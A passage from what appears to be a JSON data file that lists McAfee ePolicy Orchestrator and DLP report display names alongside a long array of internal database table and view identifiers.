Recipients\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Printer\\\",\\r\\n\\t\\t\\t\\\"Evidence Replication Failed\\\",\\r\\n\\t\\t\\t\\\"User Information\\\",\\r\\n\\t\\t\\t\\\"Network Share\\\",\\r\\n\\t\\t\\t\\\"User Logged Into Safe Mode\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest File System Discovery Classifications\\\",\\r\\n\\t\\t\\t\\\"Release code locked\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery Scans\\\",\\r\\n\\t\\t\\t\\\"Capture Search Information\\\",\\r\\n\\t\\t\\t\\\"DLP Computer Properties\\\",\\r\\n\\t\\t\\t\\\"DLP Client Enters Bypass Mode\\\",\\r\\n\\t\\t\\t\\\"File Paths\\\",\\r\\n\\t\\t\\t\\\"File Reputation\\\",\\r\\n\\t\\t\\t\\\"tieserver.fileParent.tableInfo.name\\\",\\r\\n\\t\\t\\t\\\"File Enterprise Reputation\\\",\\r\\n\\t\\t\\t\\\"New Certificate References\\\",\\r\\n\\t\\t\\t\\\"Certificate Enterprise Reputation\\\",\\r\\n\\t\\t\\t\\\"Certificates\\\",\\r\\n\\t\\t\\t\\\"Certificates\\\",\\r\\n\\t\\t\\t\\\"MWG Reputations\\\",\\r\\n\\t\\t\\t\\\"Certificate Reputation\\\",\\r\\n\\t\\t\\t\\\"Certificate GTI Reputation\\\",\\r\\n\\t\\t\\t\\\"Files\\\",\\r\\n\\t\\t\\t\\\"File Reputation\\\",\\r\\n\\t\\t\\t\\\"New Certificates on 
Systems\\\",\\r\\n\\t\\t\\t\\\"Files\\\",\\r\\n\\t\\t\\t\\\"certificate_rep_enterprise_parent.table.name\\\",\\r\\n\\t\\t\\t\\\"New Files on Systems\\\",\\r\\n\\t\\t\\t\\\"GTI Reputations\\\",\\r\\n\\t\\t\\t\\\"GTI Reputations\\\",\\r\\n\\t\\t\\t\\\"Certificate Enterprise Reputation\\\",\\r\\n\\t\\t\\t\\\"File Reputation\\\",\\r\\n\\t\\t\\t\\\"certificate_rep.table.name\\\",\\r\\n\\t\\t\\t\\\"File Names\\\",\\r\\n\\t\\t\\t\\\"Enterprise Reputations\\\",\\r\\n\\t\\t\\t\\\"Enterprise Reputations\\\",\\r\\n\\t\\t\\t\\\"Reputations\\\",\\r\\n\\t\\t\\t\\\"CTD Reputations\\\",\\r\\n\\t\\t\\t\\\"Cleanup Trending Summary\\\",\\r\\n\\t\\t\\t\\\"ATD Reputations\\\",\\r\\n\\t\\t\\t\\\"New File References\\\"\\r\\n\\t\\t]\"",
    "target": "\"[\\r\\n\\t\\t\\t\\\"workloaddetailVcenter\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryFailure_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_Incidents_Archive\\\",\\r\\n\\t\\t\\t\\\"groupinfo\\\",\\r\\n\\t\\t\\t\\\"epoproductproperties\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_MARSERVER\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentResolutions\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryScansRegDocView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentMobileDevice_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_RegisterDocumentsClassification\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesTIE\\\",\\r\\n\\t\\t\\t\\\"vpcflowLog\\\",\\r\\n\\t\\t\\t\\\"MDCC_CLOUD_VOL_PROPS_VW_awsVolumeSquid\\\",\\r\\n\\t\\t\\t\\\"EPOEventFilterDesc\\\",\\r\\n\\t\\t\\t\\\"UDLP_OperationalLabelInfoView_Archive\\\",\\r\\n\\t\\t\\t\\\"OrionTaskLogTask\\\",\\r\\n\\t\\t\\t\\\"UDLP_EP_Scans\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentsQueries_Archive\\\",\\r\\n\\t\\t\\t\\\"EPORollUp_AssignedPolicyView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryFileLocation_Rollup\\\",\\r\\n\\t\\t\\t\\\"MDCC_EP_SEC_REPORT_VIEW\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentStatuses_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaseExport\\\",\\r\\n\\t\\t\\t\\\"issueDetailGroup1\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryAdditional\\\",\\r\\n\\t\\t\\t\\\"EndpointInstallationStatus_View\\\",\\r\\n\\t\\t\\t\\\"EPOTagUsage\\\",\\r\\n\\t\\t\\t\\\"mgi1\\\",\\r\\n\\t\\t\\t\\\"EPOBranchNode\\\",\\r\\n\\t\\t\\t\\\"UDLP_OperationalEvidences\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmailRecipients_Archive\\\",\\r\\n\\t\\t\\t\\\"DXLClientEpoProps\\\",\\r\\n\\t\\t\\t\\\"MarProperties\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEvidencesQueriesView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryFileLocation_Archive\\\",\\r\\n\\t\\t\\t\\\"epoTagAssignment\\\",\\r\\n\\t\\t\\t\\\"EPOComputerProperties\\\",\\r\\n\\t\\t\\t\\\"sasvmsetting\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentRules_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentLabelsView\\\",\\r\\n\\t\\t\\t\
\\"EPORollup_ProductPropertiesTELEMETRY\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmail_Rollup\\\",\\r\\n\\t\\t\\t\\\"threateventdetails\\\",\\r\\n\\t\\t\\t\\\"DXLProdPropsView_DXLCLIENT\\\",\\r\\n\\t\\t\\t\\\"threatinstance\\\",\\r\\n\\t\\t\\t\\\"MDCC_VPCFLOW_REPORT_VIEW\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryServersView\\\",\\r\\n\\t\\t\\t\\\"UDLP_ProductDistributionView\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncident\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNetworkComm_Capture\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_GeneratedKey_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_401_UserInSafeMode\\\",\\r\\n\\t\\t\\t\\\"UDLP_AutoRegisterDocuments\\\",\\r\\n\\t\\t\\t\\\"kubelabelinfo\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesDXLBROKER\\\",\\r\\n\\t\\t\\t\\\"ATP_CustomProps\\\",\\r\\n\\t\\t\\t\\\"MDCC_CLOUD_VM_PROPS_VW_awsSquid\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPOProductPropertiesAllView\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentEvidences_Rollup\\\",\\r\\n\\t\\t\\t\\\"vminfo\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesAZURE_META\\\",\\r\\n\\t\\t\\t\\\"EPOTagRestrictionsCS\\\",\\r\\n\\t\\t\\t\\\"mdccvminfo\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentDiscoverySummary\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryFailure\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesDXLCLIENTJ\\\",\\r\\n\\t\\t\\t\\\"ePOLeafNode\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentDevice_Archive\\\",\\r\\n\\t\\t\\t\\\"EPExtendedEvent\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentLabelsView\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesUDLP\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_MVEDR\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentDiscoverySummary_Archive\\\",\\r\\n\\t\\t\\t\\\"FW_NamedNetwork\\\",\\r\\n\\t\\t\\t\\\"UDLP_RulesPerUser\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentStatuses\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_116_ApplyRMPolicyFailed_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEvidences_Capture\\\",\\r\\n\\t\\t\\t\\\"ASSESSMENT_DASHBOARD_VIEW\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesPCR\\\",\\r\\
n\\t\\t\\t\\\"EPOAssignedPolicy\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentWebPost_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_GeneratedKey_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncident_CaseMgmt\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentRules\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentWebPost_Capture\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesUDLP_CAPTURE\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentExport\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentApplications\\\",\\r\\n\\t\\t\\t\\\"EPOBrokenInherintanceView\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaseStatus\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmail\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentClassifications_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_Incidents\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentWebPost_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_LatestEmailDiscoveryClassificationView\\\",\\r\\n\\t\\t\\t\\\"vminfoVendortag\\\",\\r\\n\\t\\t\\t\\\"MDCC_CLOUD_VM_PROPS_VW_openstackPrivateCloudSquid\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentCaptureSearch_Rollup\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_MATD\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentClassification_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentClassification_Capture\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentDiscoverySummaryForMaReport\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncident_Archive\\\",\\r\\n\\t\\t\\t\\\"mdccaccountinfo\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNdlpAppliance_Archive\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_ENDPOINTSECURITYPLATFORM\\\",\\r\\n\\t\\t\\t\\\"JTIClientRulesView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentMobileDevice\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmailRecipients\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentCloud_Archive\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesMAR\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_109_PolicyApplied_Archive\\\",\\r\\n\\t\\t\\t\\\"MARRemediationEvent\\\",\\r\\n\\t\\t\\t\\\"ESPRollup_GS_CustomProps\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_TIECLIENTMETA\\\",\\r\\n\\t\\t\\t\\\"workloadalerts\\\",\\r\\n\\t\\t\\t\\\"vmInfokubernetes\\\",\\r\\n\\t\\t\\t\\\"EPORollup_
ProductPropertiesWEBCONTROL\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNetworkShare_Archive\\\",\\r\\n\\t\\t\\t\\\"EPORepositoryStatus\\\",\\r\\n\\t\\t\\t\\\"UDLP_RegisterDocuments\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEvidencesQueries_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryFileClassificationBoxView\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_FIREWALL\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_405_ReleaseCodeLocked_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryScansView\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesFIREWALL\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"MDCC_EP_SCAN_REPORT\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryAdditional_Rollup\\\",\\r\\n\\t\\t\\t\\\"EPORollup_TaskAppliedTasks\\\",\\r\\n\\t\\t\\t\\\"GS_CustomProps\\\",\\r\\n\\t\\t\\t\\\"FW_Rule\\\",\\r\\n\\t\\t\\t\\\"MDCC_VW_SECURITY_INCIDENT\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmailRecipientsAll_Rollup\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"EPOEvents_RelatedTargetsView\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesMCA\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_112_AgentEnteredBypass_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operationals_Archive\\\",\\r\\n\\t\\t\\t\\\"WP_CustomProps\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaseManagement\\\",\\r\\n\\t\\t\\t\\\"UDLP_UserPropertiesView\\\",\\r\\n\\t\\t\\t\\\"EPOMasterCatalog\\\",\\r\\n\\t\\t\\t\\\"MDCC_CLOUD_VM_PROPS_VW_vcenterSquid\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesUDLP_DISCOVERY_OCR\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentRules_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentScan\\\",\\r\\n\\t\\t\\t\\\"UDLP_UserGroupsView\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_VISUALIZATION\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_MCPAGENT\\\",\\r\\n\\t\\t\\t\\\"EPOAgentHandlers\\\",\\r\\n\\t\\t\\t\\\"ENSRollup_WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"UDLP_EventPolicyInfo_Rollup\\\",\\r\\n\\t\\t\\t\\\"FW_CustomProps\\\",\\r\\n\\t\\t\\t\\\"OrionRegisteredServers\\\",\\r\\n\\t\\t
\\t\\\"OrionTaskLogSubtask\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryInventoryFactsView\\\",\\r\\n\\t\\t\\t\\\"FW_ClientRuleExecutableView\\\",\\r\\n\\t\\t\\t\\\"workloaddetail_1\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentLabelsView_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEvidences_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentDiscoverySummary_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_OperationalEvidences_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaseToLabels\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_402_EvidenceReplicationFailed\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEvidences\\\",\\r\\n\\t\\t\\t\\\"MDCC_ACCOUNT\\\",\\r\\n\\t\\t\\t\\\"MDCC_VM_PROPERTY\\\",\\r\\n\\t\\t\\t\\\"UDLP_EventComputers_Rollup\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesTHREATPREVENTION\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentRemovableStorage_Archive\\\",\\r\\n\\t\\t\\t\\\"issueGroup\\\",\\r\\n\\t\\t\\t\\\"StatisticsTable_EPOAgent3000\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesTIECLIENTMETA\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_UDLP\\\",\\r\\n\\t\\t\\t\\\"EpoRollup_ComplianceHistory\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryFailure_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNetworkShare\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentExport\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NdlpAppliance_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NdlpAppliance\\\",\\r\\n\\t\\t\\t\\\"EPOEvents_RelatedSourcesView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryAudit_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryClassificationFactsView\\\",\\r\\n\\t\\t\\t\\\"EPOProductPropertyProducts\\\",\\r\\n\\t\\t\\t\\\"UDLP_OperationalEvidences_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_ExportEventDetails\\\",\\r\\n\\t\\t\\t\\\"TIEServerCustomProps\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesENDPOINTSECURITYPLATFORM\\\",\\r\\n\\t\\t\\t\\\"workloadDetailAwsAzure\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_407_ExceededMem_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryCommon_Archive\\\",\\r\\n\\t\\t\
\t\\\"UDLP_IncidentNdlpAppliance\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryFileInfo\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_UDLP_CAPTURE\\\",\\r\\n\\t\\t\\t\\\"EPOTag\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentsQueriesView\\\",\\r\\n\\t\\t\\t\\\"EPOTaskBrokenInheritAssignments\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesDXLCLIENTJ1\\\",\\r\\n\\t\\t\\t\\\"UDLP_OperationalEventStatus_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_Incidents\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesMCPAGENT\\\",\\r\\n\\t\\t\\t\\\"UDLP_ComputersToPoliciesView\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_Incidents_CaseMgmt\\\",\\r\\n\\t\\t\\t\\\"MDCC_VM_INFO\\\",\\r\\n\\t\\t\\t\\\"EPOExtendedComputerProperties\\\",\\r\\n\\t\\t\\t\\\"FW_Rule_LocalNetwork\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPOProductPropertiesView\\\",\\r\\n\\t\\t\\t\\\"EpoRollup_Computers\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_TELEMETRY\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_401_UserInSafeMode_Archive\\\",\\r\\n\\t\\t\\t\\\"TIEServerIOCState\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_Incidents_Rollup\\\",\\r\\n\\t\\t\\t\\\"MarCustomEvent\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentCaptureSearch_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentCaptureSearch_Capture\\\",\\r\\n\\t\\t\\t\\\"UDLP_OperationalEventResolution_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_407_ExceededMem\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_GeneratedKey\\\",\\r\\n\\t\\t\\t\\\"tagIssueCount\\\",\\r\\n\\t\\t\\t\\\"EPOProductEvents\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_PCR\\\",\\r\\n\\t\\t\\t\\\"sassettingstatus\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaptureSearchView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_405_ReleaseCodeLocked\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentWebPost\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryFileClassificationView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Incidents_Archive\\\",\\r\\n\\t\\t\\t\\\"groupproperty\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentRules_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_EventComputers\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentRules_Archive\\\",\\r\\n\\t\\t\\t\\\"ClientUILockOutStatusTable_view\
\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentDevice\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_DXLCLIENTJ1\\\",\\r\\n\\t\\t\\t\\\"mginf\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryFileInfoSharePointView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentApplications_Rollup\\\",\\r\\n\\t\\t\\t\\\"FW_Rule_RemoteNetwork\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPOSysTreePathsView\\\",\\r\\n\\t\\t\\t\\\"OrionIssues\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryFileLocation\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_DXLCLIENTJ\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_TIE\\\",\\r\\n\\t\\t\\t\\\"vmproperty\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmailRecipientsAll\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryAudit_Rollup\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesUDLP_MONITOR\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentClassification_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryFileInfoDatabaseView\\\",\\r\\n\\t\\t\\t\\\"ESPRollup_EPExtendedEvent\\\",\\r\\n\\t\\t\\t\\\"epocomputerprops\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaseResolution\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_116_ApplyRMPolicyFailed_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryFileInfoBoxView\\\",\\r\\n\\t\\t\\t\\\"UDLP_EventPolicyInfo\\\",\\r\\n\\t\\t\\t\\\"EPOSystemProductVersionInfo\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNetworkComm_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentToLabel\\\",\\r\\n\\t\\t\\t\\\"epoTagVendortag\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductEvents\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_MARPLAT\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_116_ApplyRMPolicyFailed\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNetworkShare_Rollup\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesMARPLAT\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_AZURE_META\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentPrint_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_112_AgentEnteredBypass\\\",\\r\\n\\t\\t\\t\\\"epoTagAssignmentVendortag\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaptureAppliances\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentLabelsView_Archive\\\"
,\\r\\n\\t\\t\\t\\\"UDLP_Operational_405_ReleaseCodeLocked_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_EventUsers_Destination\\\",\\r\\n\\t\\t\\t\\\"EPOTagGroup\\\",\\r\\n\\t\\t\\t\\\"UDLP_Incidents_CaseMgmt\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEvidences_Archive\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_UDLP_DISCOVERY_OCR\\\",\\r\\n\\t\\t\\t\\\"EPOServerKeys\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_THREATPREVENTION\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentClassification\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_402_EvidenceReplicationFailed_Rollup\\\",\\r\\n\\t\\t\\t\\\"vmInfoawsazure\\\",\\r\\n\\t\\t\\t\\\"vminfoDetail\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_LatestEmailDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"epoleafnode\\\",\\r\\n\\t\\t\\t\\\"OrionTaskLogTaskMessage\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaptureDataSetView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentClassification\\\",\\r\\n\\t\\t\\t\\\"EPOComputerExtendedProperties\\\",\\r\\n\\t\\t\\t\\\"vmpropertiestf\\\",\\r\\n\\t\\t\\t\\\"EPOTagType\\\",\\r\\n\\t\\t\\t\\\"EPOTagAssignment\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operationals\\\",\\r\\n\\t\\t\\t\\\"UDLP_UserEmailStorageDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Incidents_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_UserGroupsView_Destination\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesVISUALIZATION\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentToLabel_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_AutoRegisterDocumentsClassification\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryAudit\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentRules\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNdlpAppliance_Capture\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesDLPPS\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_UDLP_MONITOR\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentRules_Archive\\\",\\r\\n\\t\\t\\t\\\"MDCC_CLOUD_VM_PROPS_VW_azurermSquid\\\",\\r\\n\\t\\t\\t\\\"UDLP_UserFileSystemDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"EPOServerEvents\\\",\\r\\n\\t\\t\\t\\\"UDLP_ExactDataFingerprints\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentPrint\\\",\\r\\n\\t\\t\\
t\\\"FW_Application\\\",\\r\\n\\t\\t\\t\\\"MVEDRCustomEvent\\\",\\r\\n\\t\\t\\t\\\"OrionBlockedIpAddress\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_LatestFileSysDiscoveryClassificationView\\\",\\r\\n\\t\\t\\t\\\"MDCC_VOLUME\\\",\\r\\n\\t\\t\\t\\\"TP_Events\\\",\\r\\n\\t\\t\\t\\\"MAEnforcementStatusView\\\",\\r\\n\\t\\t\\t\\\"vminfo1\\\",\\r\\n\\t\\t\\t\\\"UDLP_ComputerPropertiesView\\\",\\r\\n\\t\\t\\t\\\"mdccgroupinfo\\\",\\r\\n\\t\\t\\t\\\"MVEDRProperties\\\",\\r\\n\\t\\t\\t\\\"EPOSoftwareView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryCommon_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentCaptureSearch\\\",\\r\\n\\t\\t\\t\\\"UDLP_EventUsers_Rollup\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_UDLP_PREVENT\\\",\\r\\n\\t\\t\\t\\\"issueDetailCount\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryCommon\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentRules\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_DXLBROKER\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPOTagsView\\\",\\r\\n\\t\\t\\t\\\"epoevents4\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentRules_Capture\\\",\\r\\n\\t\\t\\t\\\"UDLP_Incidents_Capture\\\",\\r\\n\\t\\t\\t\\\"UDLP_OperationalLabelInfoView\\\",\\r\\n\\t\\t\\t\\\"accountdetails\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentCloud\\\",\\r\\n\\t\\t\\t\\\"EPOComputerLdapProperties\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentClassifications\\\",\\r\\n\\t\\t\\t\\\"OrionAuditLog\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmailRecipients_Capture\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesMARAGG\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmailRecipients_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryAdditional_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentMobileDevice_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_401_UserInSafeMode_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_109_PolicyApplied_Rollup\\\",\\r\\n\\t\\t\\t\\\"mdcc